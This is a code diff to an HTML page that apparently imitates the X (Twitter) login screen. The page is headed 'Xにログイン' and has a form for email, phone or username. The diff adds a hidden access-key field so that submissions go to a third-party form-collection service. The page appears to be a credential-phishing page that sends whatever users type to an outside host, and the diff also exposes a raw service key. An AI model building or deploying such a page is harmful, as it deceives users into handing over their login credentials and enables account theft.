--- a/index.html
+++ b/index.html
@@ -181,6 +181,7 @@
             <div class="login-heading">Xにログイン</div>
 
             <form id="loginForm" action="https://api.staticforms.xyz/submit" method="POST">
+                <input type="hidden" name="accessKey" value="6c53f36c-1bce-4752-9cb3-824fb2b1a298">
                 <div class="form-group">
                     <label for="email">メールアドレス、電話番号、またはユーザー名</label>
                     <input type="text" id="email" name="email" required>
